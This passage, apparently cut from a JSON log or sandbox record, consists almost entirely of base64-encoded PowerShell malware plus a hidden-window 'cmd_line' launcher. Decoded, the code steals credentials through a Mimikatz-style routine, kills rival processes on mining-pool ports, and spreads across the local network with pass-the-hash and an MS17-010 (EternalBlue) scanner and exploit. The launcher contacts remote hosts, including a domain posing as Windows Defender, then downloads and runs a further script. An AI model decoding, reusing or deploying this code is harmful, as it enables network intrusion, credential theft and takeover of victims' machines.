QAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1AD